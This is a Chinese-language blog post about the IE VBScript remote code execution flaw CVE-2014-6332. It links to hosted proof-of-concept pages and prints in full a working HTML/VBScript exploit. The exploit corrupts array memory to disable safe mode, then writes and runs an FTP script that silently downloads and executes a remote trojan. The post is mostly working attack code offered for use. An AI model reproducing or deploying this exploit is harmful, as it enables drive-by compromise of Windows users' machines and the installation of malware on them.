Win95+IE3 – Win10+IE11全版本执行漏洞(含POC)

微软本月安全更新修复了一个潜藏了18年的IE远程代码执行漏洞(CVE-2014-6332)。缺陷出现在VBScript的代码中,自Windows 95首次发布(19年前)以来就一直存在。此漏洞攻击IE包括基于IE内核设计的浏览器(比如360,QQ浏览器等)。


关于微软安全补丁

微软披露了一个存在于所有Windows版本的高危漏洞。建议所有Windows用户,尤其是运行网站的用户应尽快安装微软周二发布的补丁。

《微软披露影响所有Windows版本的高危漏洞》

《Microsoft昨日发布高达16个安全补丁》

POC之一:打开任务管理器和计算器

测试地址:http://www.weizn.net/exp/ie.html

测试截图

test1.jpg



POC之二:添加wayne账户

测试地址:http://www.weizn.net/exp/useradd.htm

测试截图

test2.jpg


POC之三:远程木马下载

代码如下:




    <!DOCTYPE html>  
    <html>  
    <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >  
        <meta http-equiv="content-type" content="text/html;charset=utf-8">  
    <head>  
    </head>  
    <body>  
    <SCRIPT LANGUAGE="VBScript">  
      
    function runmumaa()   
    On Error Resume Next
    Set objWsh = CreateObject("Wscript.Shell")

    objWsh.run "cmd.exe /c echo whoami>d:\Notepad.bat&echo netstat -an>>d:\Notepad.bat&echo set>>d:\Notepad.bat&echo open FTP地址>>d:\Notepad.bat&echo username>>d:\Notepad.bat&echo password>>d:\Notepad.bat&echo dir>>d:\Notepad.bat&echo get sec.exe d:\Notepad.exe>>d:\Notepad.bat&echo bye>>d:\Notepad.bat",0
    objWsh.run "cmd.exe /c ftp -s:d:\Notepad.bat",0,true
    objWsh.run "cmd.exe /c D:\Notepad.exe -e",0,true
    document.write(Err.Description)
    end function  
      
    </script>  
      
    <SCRIPT LANGUAGE="VBScript">  
       
    dim   aa()  
    dim   ab()  
    dim   a0  
    dim   a1  
    dim   a2  
    dim   a3  
    dim   win9x  
    dim   intVersion  
    dim   rnda  
    dim   funclass  
    dim   myarray  
      
    Begin()  
      
    function Begin()  
      On Error Resume Next  
      info=Navigator.UserAgent  
      
      if(instr(info,"Win64")>0)   then  
         exit   function  
      end if  
      
      if (instr(info,"MSIE")>0)   then   
                 intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2))     
      else  
         exit   function    
                   
      end if  
      
      win9x=0  
      
      BeginInit()  
      If Create()=True Then  
         myarray=        chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00)  
         myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0)  
      
         if(intVersion<4) then  
             document.write("<br> IE")  
             document.write(intVersion)  
             runshellcode()                      
         else    
              setnotsafemode()  
         end if  
      end if  
    end function  
      
    function BeginInit()  
       Randomize()  
       redim aa(5)  
       redim ab(5)  
       a0=13+17*rnd(6)  
       a3=7+3*rnd(5)  
    end function  
      
    function Create()  
      On Error Resume Next  
      dim i  
      Create=False  
      For i = 0 To 400  
        If Over()=True Then  
        '   document.write(i)       
           Create=True  
           Exit For  
        End If   
      Next  
    end function  
      
    sub testaa()  
    end sub  
      
    function mydata()  
        On Error Resume Next  
         i=testaa  
         i=null  
         redim  Preserve aa(a2)    
        
         ab(0)=0  
         aa(a1)=i  
         ab(0)=6.36598737437801E-314  
      
         aa(a1+2)=myarray  
         ab(2)=1.74088534731324E-310    
         mydata=aa(a1)  
         redim  Preserve aa(a0)    
    end function   
      
      
    function setnotsafemode()  
        On Error Resume Next  
        i=mydata()    
        i=readmemo(i+8)  
        i=readmemo(i+16)  
        j=readmemo(i+&h134)    
        for k=0 to &h60 step 4  
            j=readmemo(i+&h120+k)  
            if(j=14) then  
                  j=0            
                  redim  Preserve aa(a2)               
         aa(a1+2)(i+&h11c+k)=ab(4)  
                  redim  Preserve aa(a0)    
      
         j=0   
                  j=readmemo(i+&h120+k)     
               
                   Exit for  
               end if  
      
        next   
        ab(2)=1.69759663316747E-313  
        runmumaa()   
    end function  
      
    function Over()  
        On Error Resume Next  
        dim type1,type2,type3  
        Over=False  
        a0=a0+a3  
        a1=a0+2  
        a2=a0+&h8000000  
        
        redim  Preserve aa(a0)   
        redim   ab(a0)       
        
        redim  Preserve aa(a2)  
        
        type1=1  
        ab(0)=1.123456789012345678901234567890  
        aa(a0)=10  
                
        If(IsObject(aa(a1-1)) = False) Then  
           if(intVersion<4) then  
               mem=cint(a0+1)*16               
               j=vartype(aa(a1-1))  
               if((j=mem+4) or (j*8=mem+8)) then  
                  if(vartype(aa(a1-1))<>0)  Then      
                     If(IsObject(aa(a1)) = False ) Then               
                       type1=VarType(aa(a1))  
                     end if                 
                  end if  
               else  
                 redim  Preserve aa(a0)  
                 exit  function  
      
               end if   
            else  
               if(vartype(aa(a1-1))<>0)  Then      
                  If(IsObject(aa(a1)) = False ) Then  
                      type1=VarType(aa(a1))  
                  end if                 
                end if  
            end if  
        end if  
                    
          
        If(type1=&h2f66) Then           
              Over=True        
        End If    
        If(type1=&hB9AD) Then  
              Over=True  
              win9x=1  
        End If    
      
        redim  Preserve aa(a0)            
              
    end function  
      
    function ReadMemo(add)   
        On Error Resume Next  
        redim  Preserve aa(a2)    
        
        ab(0)=0     
        aa(a1)=add+4       
        ab(0)=1.69759663316747E-313         
        ReadMemo=lenb(aa(a1))    
         
        ab(0)=0      
       
        redim  Preserve aa(a0)  
    end function  
      
    </script>  
      
    </body>  
    </html>